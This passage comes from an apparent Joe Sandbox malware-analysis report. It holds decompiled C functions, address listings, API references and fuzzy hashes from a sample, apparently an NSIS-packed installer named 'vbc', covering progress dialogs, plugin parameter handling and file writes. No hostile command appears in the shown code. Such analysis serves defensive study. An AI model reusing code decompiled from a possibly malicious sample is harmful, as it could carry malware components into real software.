                    				if(_a8 == 0x113) {
                    					_t20 =  *0x7936f8; // 0x4fcbb
                    					_t11 =  *0x79f704; // 0x4fcbf
                    					if(_t20 >= _t11) {
                    						_t20 = _t11;
                    					}
                    					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                    					SetWindowTextW(_a4,  &_v132);
                    					SetDlgItemTextW(_a4, 0x406,  &_v132);
                    				}
                    				return 0;
                    			}






                    0x00402fa3
                    0x00402fb1
                    0x00402fb7
                    0x00402fb7
                    0x00402fc5
                    0x00402fc7
                    0x00402fcd
                    0x00402fd4
                    0x00402fd6
                    0x00402fd6
                    0x00402fec
                    0x00402ffc
                    0x0040300e
                    0x0040300e
                    0x00403016

                    APIs
                    Strings
                    • verifying installer: %d%%, xrefs: 00402FE6
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: Text$ItemTimerWindowwsprintf
                    • String ID: verifying installer: %d%%
                    • API String ID: 1451636040-82062127
                    • Opcode ID: d023595f9e9ef59bdd75dda31b52a3c2e885d3e2bc42a898f2d7cd706f4c6b2f
                    • Instruction ID: 93fc8baa8d380bd3002b945ae1bdcf8604075b20dc3457daa0419b6feabf18a2
                    • Opcode Fuzzy Hash: d023595f9e9ef59bdd75dda31b52a3c2e885d3e2bc42a898f2d7cd706f4c6b2f
                    • Instruction Fuzzy Hash: EC014F7064020DBBEF209F60DE4ABEA3B79EB00345F108039FA06B51D0DBB99A559B58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 75%
                    			E734F2655() {
                    				intOrPtr _t24;
                    				void* _t26;
                    				intOrPtr _t27;
                    				signed int _t39;
                    				void* _t40;
                    				void* _t43;
                    				intOrPtr _t44;
                    				void* _t45;
                    
                    				_t40 = E734F12BB();
                    				_t24 =  *((intOrPtr*)(_t45 + 0x18));
                    				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
                    				_t43 = (_t44 + 0x81 << 5) + _t24;
                    				do {
                    					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
                    					}
                    					_t39 =  *(_t43 - 8) & 0x000000ff;
                    					if(_t39 <= 7) {
                    						switch( *((intOrPtr*)(_t39 * 4 +  &M734F2784))) {
                    							case 0:
                    								 *_t40 = 0;
                    								goto L17;
                    							case 1:
                    								__eax =  *__eax;
                    								if(__ecx > __ebx) {
                    									 *(__esp + 0x10) = __ecx;
                    									__ecx =  *(0x734f407c + __edx * 4);
                    									__edx =  *(__esp + 0x10);
                    									__ecx = __ecx * __edx;
                    									asm("sbb edx, edx");
                    									__edx = __edx & __ecx;
                    									__eax = __eax &  *(0x734f409c + __edx * 4);
                    								}
                    								_push(__eax);
                    								goto L15;
                    							case 2:
                    								__eax = E734F1510(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
                    								goto L16;
                    							case 3:
                    								__ecx =  *0x734f506c;
                    								__edx = __ecx - 1;
                    								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
                    								__eax =  *0x734f506c;
                    								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
                    								goto L17;
                    							case 4:
                    								__eax = lstrcpynW(__edi,  *__eax,  *0x734f506c);
                    								goto L17;
                    							case 5:
                    								_push( *0x734f506c);
                    								_push(__edi);
                    								_push( *__eax);
                    								__imp__StringFromGUID2();
                    								goto L17;
                    							case 6:
                    								_push( *__esi);
                    								L15:
                    								__eax = wsprintfW(__edi, 0x734f5000);
                    								L16:
                    								__esp = __esp + 0xc;
                    								goto L17;
                    						}
                    					}
                    					L17:
                    					_t26 =  *(_t43 + 0x14);
                    					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
                    						GlobalFree(_t26);
                    					}
                    					_t27 =  *((intOrPtr*)(_t43 + 0xc));
                    					if(_t27 != 0) {
                    						if(_t27 != 0xffffffff) {
                    							if(_t27 > 0) {
                    								E734F1381(_t27 - 1, _t40);
                    								goto L26;
                    							}
                    						} else {
                    							E734F1312(_t40);
                    							L26:
                    						}
                    					}
                    					_t44 = _t44 - 1;
                    					_t43 = _t43 - 0x20;
                    				} while (_t44 >= 0);
                    				return GlobalFree(_t40);
                    			}











                    0x734f265f
                    0x734f2661
                    0x734f2665
                    0x734f2674
                    0x734f2678
                    0x734f267d
                    0x734f267d
                    0x734f2685
                    0x734f268c
                    0x734f2692
                    0x00000000
                    0x734f2699
                    0x00000000
                    0x00000000
                    0x734f26a1
                    0x734f26a5
                    0x734f26a8
                    0x734f26ac
                    0x734f26b3
                    0x734f26b7
                    0x734f26bd
                    0x734f26bf
                    0x734f26c1
                    0x734f26c1
                    0x734f26c8
                    0x00000000
                    0x00000000
                    0x734f26d1
                    0x00000000
                    0x00000000
                    0x734f26d8
                    0x734f26de
                    0x734f26e8
                    0x734f26ee
                    0x734f26f3
                    0x00000000
                    0x00000000
                    0x734f2714
                    0x00000000
                    0x00000000
                    0x734f26fa
                    0x734f2700
                    0x734f2701
                    0x734f2703
                    0x00000000
                    0x00000000
                    0x734f271c
                    0x734f271e
                    0x734f2724
                    0x734f272a
                    0x734f272a
                    0x00000000
                    0x00000000
                    0x734f2692
                    0x734f272d
                    0x734f272d
                    0x734f2732
                    0x734f2743
                    0x734f2743
                    0x734f2749
                    0x734f274e
                    0x734f2753
                    0x734f275f
                    0x734f2764
                    0x00000000
                    0x734f2769
                    0x734f2755
                    0x734f2756
                    0x734f276a
                    0x734f276a
                    0x734f2753
                    0x734f276b
                    0x734f276c
                    0x734f276f
                    0x734f2783

                    APIs
                      • Part of subcall function 734F12BB: GlobalAlloc.KERNELBASE(00000040,?,734F12DB,?,734F137F,00000019,734F11CA,-000000A0), ref: 734F12C5
                    • GlobalFree.KERNEL32(?), ref: 734F2743
                    • GlobalFree.KERNEL32(00000000), ref: 734F2778
                    Memory Dump Source
                    • Source File: 00000004.00000002.1159305311.00000000734F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 734F0000, based on PE: true
                    • Associated: 00000004.00000002.1159300360.00000000734F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000004.00000002.1159309786.00000000734F4000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000004.00000002.1159313695.00000000734F6000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_734f0000_vbc.jbxd
                    Similarity
                    • API ID: Global$Free$Alloc
                    • String ID:
                    • API String ID: 1780285237-0
                    • Opcode ID: 67e428c09d0736c4ddb173c34d18a591b72c0ecb6a2e3c3b6a7bf603a76ea03c
                    • Instruction ID: d3a529518b3a09acee0658c5e45db5b2eba8755f844ca550f4f525dd77c009b3
                    • Opcode Fuzzy Hash: 67e428c09d0736c4ddb173c34d18a591b72c0ecb6a2e3c3b6a7bf603a76ea03c
                    • Instruction Fuzzy Hash: 8B31027A10810BEFD71EAF95C884F2A7BFAFB8530472C412CF105A32A0CB315825CB69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 86%
                    			E00402950(int __ebx, void* __eflags) {
                    				WCHAR* _t26;
                    				void* _t29;
                    				long _t37;
                    				int _t49;
                    				void* _t52;
                    				void* _t54;
                    				void* _t56;
                    				void* _t59;
                    				void* _t60;
                    				void* _t61;
                    
                    				_t49 = __ebx;
                    				_t52 = 0xfffffd66;
                    				_t26 = E00402DA6(0xfffffff0);
                    				_t55 = _t26;
                    				 *(_t61 - 0x40) = _t26;
                    				if(E00405E60(_t26) == 0) {
                    					E00402DA6(0xffffffed);
                    				}
                    				E00405FE5(_t55);
                    				_t29 = E0040600A(_t55, 0x40000000, 2);
                    				 *(_t61 + 8) = _t29;
                    				if(_t29 != 0xffffffff) {
                    					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
                    					if( *(_t61 - 0x28) != _t49) {
                    						_t37 =  *0x7a8a74;
                    						 *(_t61 - 0x44) = _t37;
                    						_t54 = GlobalAlloc(0x40, _t37);
                    						if(_t54 != _t49) {
                    							E004034C2(_t49);
                    							E004034AC(_t54,  *(_t61 - 0x44));
                    							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
                    							 *(_t61 - 0x10) = _t59;
                    							if(_t59 != _t49) {
                    								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
                    								while( *_t59 != _t49) {
                    									_t60 = _t59 + 8;
                    									 *(_t61 - 0x3c) =  *_t59;
                    									E00405FC5( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                    									_t59 = _t60 +  *(_t61 - 0x3c);
                    								}
                    								GlobalFree( *(_t61 - 0x10));
                    							}
                    							E004060BC( *(_t61 + 8), _t54,  *(_t61 - 0x44));
                    							GlobalFree(_t54);
                    							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
                    						}
                    					}
                    					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
                    					CloseHandle( *(_t61 + 8));
                    				}
                    				_t56 = 0xfffffff3;
                    				if(_t52 < _t49) {
                    					_t56 = 0xffffffef;
                    					DeleteFileW( *(_t61 - 0x40));
                    					 *((intOrPtr*)(_t61 - 4)) = 1;
                    				}
                    				_push(_t56);
                    				E00401423();
                    				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t61 - 4));
                    				return 0;
                    			}













                    0x00402950
                    0x00402952
                    0x00402957
                    0x0040295c
                    0x0040295f
                    0x00402969
                    0x0040296d
                    0x0040296d
                    0x00402973
                    0x00402980
                    0x00402988
                    0x0040298b
                    0x00402997
                    0x0040299a
                    0x004029a0
                    0x004029ae
                    0x004029b3
                    0x004029b7
                    0x004029ba
                    0x004029c3
                    0x004029cf
                    0x004029d3
                    0x004029d6
                    0x004029e0
                    0x004029ff
                    0x004029ec
                    0x004029f4
                    0x004029f7
                    0x004029fc
                    0x004029fc
                    0x00402a06
                    0x00402a06
                    0x00402a13
                    0x00402a19
                    0x00402a1f
                    0x00402a1f
                    0x004029b7
                    0x00402a33
                    0x00402a35
                    0x00402a35
                    0x00402a3f
                    0x00402a40
                    0x00402a44
                    0x00402a48
                    0x00402a4e
                    0x00402a4e
                    0x00402a55
                    0x004022f1
                    0x00402c2d
                    0x00402c39

                    APIs
                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                    • GlobalFree.KERNEL32(?), ref: 00402A06
                    • GlobalFree.KERNEL32(00000000), ref: 00402A19
                    • CloseHandle.KERNEL32(?), ref: 00402A35
                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                    • String ID:
                    • API String ID: 2667972263-0
                    • Opcode ID: 120012c0658411ce1531804f947d12fcad7357e09ece28a0d9f1d195cd4c3617
                    • Instruction ID: ce13e03cd45963b48540e15e7c975c75beca6294bacda27d7b2280c3fc44a057
                    • Opcode Fuzzy Hash: 120012c0658411ce1531804f947d12fcad7357e09ece28a0d9f1d195cd4c3617
                    • Instruction Fuzzy Hash: CA31B171D00124BBCF216FA5CE89D9EBE79EF49364F14423AF450762E1CB794C429B98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 97%
                    			E734F1979(signed int __edx, void* __eflags, void* _a8, void* _a16) {
                    				void* _v8;
                    				signed int _v12;
                    				signed int _v20;
                    				signed int _v24;
                    				char _v76;
                    				void _t45;
                    				signed int _t46;
                    				signed int _t47;
                    				signed int _t48;
                    				signed int _t57;
                    				signed int _t58;
                    				signed int _t59;
                    				signed int _t60;
                    				signed int _t61;
                    				void* _t67;
                    				void* _t68;
                    				void* _t69;
                    				void* _t70;
                    				void* _t71;
                    				signed int _t77;
                    				void* _t81;
                    				signed int _t83;
                    				signed int _t85;
                    				signed int _t87;
                    				signed int _t90;
                    				void* _t101;
                    
                    				_t85 = __edx;
                    				 *0x734f506c = _a8;
                    				_t77 = 0;
                    				 *0x734f5070 = _a16;
                    				_v12 = 0;
                    				_v8 = E734F12E3();
                    				_t90 = E734F13B1(_t42);
                    				_t87 = _t85;
                    				_t81 = E734F12E3();
                    				_a8 = _t81;
                    				_t45 =  *_t81;
                    				if(_t45 != 0x7e && _t45 != 0x21) {
                    					_a16 = E734F12E3();
                    					_t77 = E734F13B1(_t74);
                    					_v12 = _t85;
                    					GlobalFree(_a16);
                    					_t81 = _a8;
                    				}
                    				_t46 =  *_t81 & 0x0000ffff;
                    				_t101 = _t46 - 0x2f;
                    				if(_t101 > 0) {
                    					_t47 = _t46 - 0x3c;
                    					__eflags = _t47;
                    					if(_t47 == 0) {
                    						__eflags =  *((short*)(_t81 + 2)) - 0x3c;
                    						if( *((short*)(_t81 + 2)) != 0x3c) {
                    							__eflags = _t87 - _v12;
                    							if(__eflags > 0) {
                    								L56:
                    								_t48 = 0;
                    								__eflags = 0;
                    								L57:
                    								asm("cdq");
                    								L58:
                    								_t90 = _t48;
                    								_t87 = _t85;
                    								L59:
                    								E734F1510(_t85, _t90, _t87,  &_v76);
                    								E734F1312( &_v76);
                    								GlobalFree(_v8);
                    								return GlobalFree(_a8);
                    							}
                    							if(__eflags < 0) {
                    								L49:
                    								__eflags = 0;
                    								L50:
                    								_t48 = 1;
                    								goto L57;
                    							}
                    							__eflags = _t90 - _t77;
                    							if(_t90 < _t77) {
                    								goto L49;
                    							}
                    							goto L56;
                    						}
                    						_t85 = _t87;
                    						_t48 = E734F3050(_t90, _t77, _t85);
                    						goto L58;
                    					}
                    					_t57 = _t47 - 1;
                    					__eflags = _t57;
                    					if(_t57 == 0) {
                    						__eflags = _t90 - _t77;
                    						if(_t90 != _t77) {
                    							goto L56;
                    						}
                    						__eflags = _t87 - _v12;
                    						if(_t87 != _v12) {
                    							goto L56;
                    						}
                    						goto L49;
                    					}
                    					_t58 = _t57 - 1;
                    					__eflags = _t58;
                    					if(_t58 == 0) {
                    						__eflags =  *((short*)(_t81 + 2)) - 0x3e;
                    						if( *((short*)(_t81 + 2)) != 0x3e) {
                    							__eflags = _t87 - _v12;
                    							if(__eflags < 0) {
                    								goto L56;
                    							}
                    							if(__eflags > 0) {
                    								goto L49;
                    							}
                    							__eflags = _t90 - _t77;
                    							if(_t90 <= _t77) {
                    								goto L56;
                    							}
                    							goto L49;
                    						}
                    						__eflags =  *((short*)(_t81 + 4)) - 0x3e;
                    						_t85 = _t87;
                    						_t59 = _t90;
                    						_t83 = _t77;
                    						if( *((short*)(_t81 + 4)) != 0x3e) {
                    							_t48 = E734F3070(_t59, _t83, _t85);
                    						} else {
                    							_t48 = E734F30A0(_t59, _t83, _t85);
                    						}
                    						goto L58;
                    					}
                    					_t60 = _t58 - 0x20;
                    					__eflags = _t60;
                    					if(_t60 == 0) {
                    						_t90 = _t90 ^ _t77;
                    						_t87 = _t87 ^ _v12;
                    						goto L59;
                    					}
                    					_t61 = _t60 - 0x1e;
                    					__eflags = _t61;
                    					if(_t61 == 0) {
                    						__eflags =  *((short*)(_t81 + 2)) - 0x7c;
                    						if( *((short*)(_t81 + 2)) != 0x7c) {
                    							_t90 = _t90 | _t77;
                    							_t87 = _t87 | _v12;
                    							goto L59;
                    						}
                    						__eflags = _t90 | _t87;
                    						if((_t90 | _t87) != 0) {
                    							goto L49;
                    						}
                    						__eflags = _t77 | _v12;
                    						if((_t77 | _v12) != 0) {
                    							goto L49;
                    						}
                    						goto L56;
                    					}
                    					__eflags = _t61 == 0;
                    					if(_t61 == 0) {
                    						_t90 =  !_t90;
                    						_t87 =  !_t87;
                    					}
                    					goto L59;
                    				}
                    				if(_t101 == 0) {
                    					L21:
                    					__eflags = _t77 | _v12;
                    					if((_t77 | _v12) != 0) {
                    						_v24 = E734F2EE0(_t90, _t87, _t77, _v12);
                    						_v20 = _t85;
                    						_t48 = E734F2F90(_t90, _t87, _t77, _v12);
                    						_t81 = _a8;
                    					} else {
                    						_v24 = _v24 & 0x00000000;
                    						_v20 = _v20 & 0x00000000;
                    						_t48 = _t90;
                    						_t85 = _t87;
                    					}
                    					__eflags =  *_t81 - 0x2f;
                    					if( *_t81 != 0x2f) {
                    						goto L58;
                    					} else {
                    						_t90 = _v24;
                    						_t87 = _v20;
                    						goto L59;
                    					}
                    				}
                    				_t67 = _t46 - 0x21;
                    				if(_t67 == 0) {
                    					_t48 = 0;
                    					__eflags = _t90 | _t87;
                    					if((_t90 | _t87) != 0) {
                    						goto L57;
                    					}
                    					goto L50;
                    				}
                    				_t68 = _t67 - 4;
                    				if(_t68 == 0) {
                    					goto L21;
                    				}
                    				_t69 = _t68 - 1;
                    				if(_t69 == 0) {
                    					__eflags =  *((short*)(_t81 + 2)) - 0x26;
                    					if( *((short*)(_t81 + 2)) != 0x26) {
                    						_t90 = _t90 & _t77;
                    						_t87 = _t87 & _v12;
                    						goto L59;
                    					}
                    					__eflags = _t90 | _t87;
                    					if((_t90 | _t87) == 0) {
                    						goto L56;
                    					}
                    					__eflags = _t77 | _v12;
                    					if((_t77 | _v12) == 0) {
                    						goto L56;
                    					}
                    					goto L49;
                    				}
                    				_t70 = _t69 - 4;
                    				if(_t70 == 0) {
                    					_t48 = E734F2EA0(_t90, _t87, _t77, _v12);
                    					goto L58;
                    				} else {
                    					_t71 = _t70 - 1;
                    					if(_t71 == 0) {
                    						_t90 = _t90 + _t77;
                    						asm("adc edi, [ebp-0x8]");
                    					} else {
                    						if(_t71 == 0) {
                    							_t90 = _t90 - _t77;
                    							asm("sbb edi, [ebp-0x8]");
                    						}
                    					}
                    					goto L59;
                    				}
                    			}





























                    0x734f1979
                    0x734f1983
                    0x734f198c
                    0x734f198f
                    0x734f1994
                    0x734f199d
                    0x734f19a6
                    0x734f19a8
                    0x734f19af
                    0x734f19b1
                    0x734f19b4
                    0x734f19bb
                    0x734f19c9
                    0x734f19d2
                    0x734f19d7
                    0x734f19da
                    0x734f19e0
                    0x734f19e0
                    0x734f19e3
                    0x734f19e6
                    0x734f19e9
                    0x734f1ab1
                    0x734f1ab1
                    0x734f1ab4
                    0x734f1b34
                    0x734f1b39
                    0x734f1b48
                    0x734f1b4b
                    0x734f1b53
                    0x734f1b53
                    0x734f1b53
                    0x734f1b55
                    0x734f1b55
                    0x734f1b56
                    0x734f1b56
                    0x734f1b58
                    0x734f1b5a
                    0x734f1b60
                    0x734f1b69
                    0x734f1b7a
                    0x734f1b85
                    0x734f1b85
                    0x734f1b4d
                    0x734f1b2f
                    0x734f1b2f
                    0x734f1b31
                    0x734f1b31
                    0x00000000
                    0x734f1b31
                    0x734f1b4f
                    0x734f1b51
                    0x00000000
                    0x00000000
                    0x00000000
                    0x734f1b51
                    0x734f1b3d
                    0x734f1b41
                    0x00000000
                    0x734f1b41
                    0x734f1ab6
                    0x734f1ab6
                    0x734f1ab7
                    0x734f1b26
                    0x734f1b28
                    0x00000000
                    0x00000000
                    0x734f1b2a
                    0x734f1b2d
                    0x00000000
                    0x00000000
                    0x00000000
                    0x734f1b2d
                    0x734f1ab9
                    0x734f1ab9
                    0x734f1aba
                    0x734f1af7
                    0x734f1afc
                    0x734f1b19
                    0x734f1b1c
                    0x00000000
                    0x00000000
                    0x734f1b1e
                    0x00000000
                    0x00000000
                    0x734f1b20
                    0x734f1b22
                    0x00000000
                    0x00000000
                    0x00000000
                    0x734f1b24
                    0x734f1afe
                    0x734f1b03
                    0x734f1b05
                    0x734f1b07
                    0x734f1b09
                    0x734f1b12
                    0x734f1b0b
                    0x734f1b0b
                    0x734f1b0b
                    0x00000000
                    0x734f1b09
                    0x734f1abc
                    0x734f1abc
                    0x734f1abf
                    0x734f1af0
                    0x734f1af2
                    0x00000000
                    0x734f1af2
                    0x734f1ac1
                    0x734f1ac1
                    0x734f1ac4
                    0x734f1ad7
                    0x734f1adc
                    0x734f1ae9
                    0x734f1aeb
                    0x00000000
                    0x734f1aeb
                    0x734f1ade
                    0x734f1ae0
                    0x00000000
                    0x00000000
                    0x734f1ae2
                    0x734f1ae5
                    0x00000000
                    0x00000000
                    0x00000000
                    0x734f1ae7
                    0x734f1ac7
                    0x734f1ac8
                    0x734f1ace
                    0x734f1ad0
                    0x734f1ad0
                    0x00000000
                    0x734f1ac8
                    0x734f19ef
                    0x734f1a68
                    0x734f1a6a
                    0x734f1a6d
                    0x734f1a8b
                    0x734f1a8e
                    0x734f1a94
                    0x734f1a99
                    0x734f1a6f
                    0x734f1a6f
                    0x734f1a73
                    0x734f1a77
                    0x734f1a79
                    0x734f1a79
                    0x734f1a9c
                    0x734f1aa0
                    0x00000000
                    0x734f1aa6
                    0x734f1aa6
                    0x734f1aa9
                    0x00000000
                    0x734f1aa9
                    0x734f1aa0
                    0x734f19f1
                    0x734f19f4
                    0x734f1a59
                    0x734f1a5b
                    0x734f1a5d
                    0x00000000
                    0x00000000
                    0x00000000
                    0x734f1a63
                    0x734f19f6
                    0x734f19f9
                    0x00000000
                    0x00000000
                    0x734f19fb
                    0x734f19fc
                    0x734f1a32
                    0x734f1a37
                    0x734f1a4f
                    0x734f1a51
                    0x00000000
                    0x734f1a51
                    0x734f1a39
                    0x734f1a3b
                    0x00000000
                    0x00000000
                    0x734f1a41
                    0x734f1a44
                    0x00000000
                    0x00000000
                    0x00000000
                    0x734f1a4a
                    0x734f19fe
                    0x734f1a01
                    0x734f1a28
                    0x00000000
                    0x734f1a03
                    0x734f1a03
                    0x734f1a04
                    0x734f1a18
                    0x734f1a1a
                    0x734f1a06
                    0x734f1a08
                    0x734f1a0e
                    0x734f1a10
                    0x734f1a10
                    0x734f1a08
                    0x00000000
                    0x734f1a04

                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.1159305311.00000000734F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 734F0000, based on PE: true
                    • Associated: 00000004.00000002.1159300360.00000000734F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000004.00000002.1159309786.00000000734F4000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000004.00000002.1159313695.00000000734F6000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_734f0000_vbc.jbxd
                    Similarity
                    • API ID: FreeGlobal
                    • String ID:
                    • API String ID: 2979337801-0
                    • Opcode ID: 458411f21683857108a84a060a8649dd7260fcb6d5c44e6e4cbbd4275c944797
                    • Instruction ID: 60d2fd4845723886afd4f31c48d11e59c5924cc4ad5ba204a4508bec8e1fb10b
                    • Opcode Fuzzy Hash: 458411f21683857108a84a060a8649dd7260fcb6d5c44e6e4cbbd4275c944797
                    • Instruction Fuzzy Hash: 7551C432D0011BEFDB0E9FA4848079E7BBAEB44314F1D415ED417B3398E671A946879D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 85%
                    			E734F2480(void* __edx) {
                    				void* _t37;
                    				signed int _t38;
                    				void* _t39;
                    				void* _t41;
                    				signed char* _t42;
                    				signed char* _t51;
                    				void* _t52;
                    				void* _t54;
                    
                    				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
                    				while(1) {
                    					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
                    					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
                    					_t52 = _t51[0x18];
                    					if(_t52 == 0) {
                    						goto L9;
                    					}
                    					_t41 = 0x1a;
                    					if(_t52 == _t41) {
                    						goto L9;
                    					}
                    					if(_t52 != 0xffffffff) {
                    						if(_t52 <= 0 || _t52 > 0x19) {
                    							_t51[0x18] = _t41;
                    							goto L12;
                    						} else {
                    							_t37 = E734F135A(_t52 - 1);
                    							L10:
                    							goto L11;
                    						}
                    					} else {
                    						_t37 = E734F12E3();
                    						L11:
                    						_t52 = _t37;
                    						L12:
                    						_t13 =  &(_t51[8]); // 0x1020
                    						_t42 = _t13;
                    						if(_t51[4] >= 0) {
                    						}
                    						_t38 =  *_t51 & 0x000000ff;
                    						_t51[0x1c] = 0;
                    						if(_t38 > 7) {
                    							L27:
                    							_t39 = GlobalFree(_t52);
                    							if( *(_t54 + 0x10) == 0) {
                    								return _t39;
                    							}
                    							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
                    								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
                    							} else {
                    								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
                    							}
                    							continue;
                    						} else {
                    							switch( *((intOrPtr*)(_t38 * 4 +  &M734F25F8))) {
                    								case 0:
                    									 *_t42 = 0;
                    									goto L27;
                    								case 1:
                    									__eax = E734F13B1(__ebp);
                    									goto L21;
                    								case 2:
                    									 *__edi = E734F13B1(__ebp);
                    									__edi[1] = __edx;
                    									goto L27;
                    								case 3:
                    									__eax = GlobalAlloc(0x40,  *0x734f506c);
                    									 *(__esi + 0x1c) = __eax;
                    									__edx = 0;
                    									 *__edi = __eax;
                    									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x734f506c, __eax,  *0x734f506c, 0, 0);
                    									goto L27;
                    								case 4:
                    									__eax = E734F12CC(__ebp);
                    									 *(__esi + 0x1c) = __eax;
                    									L21:
                    									 *__edi = __eax;
                    									goto L27;
                    								case 5:
                    									__eax = GlobalAlloc(0x40, 0x10);
                    									_push(__eax);
                    									 *(__esi + 0x1c) = __eax;
                    									_push(__ebp);
                    									 *__edi = __eax;
                    									__imp__CLSIDFromString();
                    									goto L27;
                    								case 6:
                    									if( *__ebp != __cx) {
                    										__eax = E734F13B1(__ebp);
                    										 *__ebx = __eax;
                    									}
                    									goto L27;
                    								case 7:
                    									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
                    									( *(__esi + 0x18) - 1) *  *0x734f506c =  *0x734f5074 + ( *(__esi + 0x18) - 1) *  *0x734f506c * 2 + 0x18;
                    									 *__ebx =  *0x734f5074 + ( *(__esi + 0x18) - 1) *  *0x734f506c * 2 + 0x18;
                    									asm("cdq");
                    									__eax = E734F1510(__edx,  *0x734f5074 + ( *(__esi + 0x18) - 1) *  *0x734f506c * 2 + 0x18, __edx,  *0x734f5074 + ( *(__esi + 0x18) - 1) *  *0x734f506c * 2);
                    									goto L27;
                    							}
                    						}
                    					}
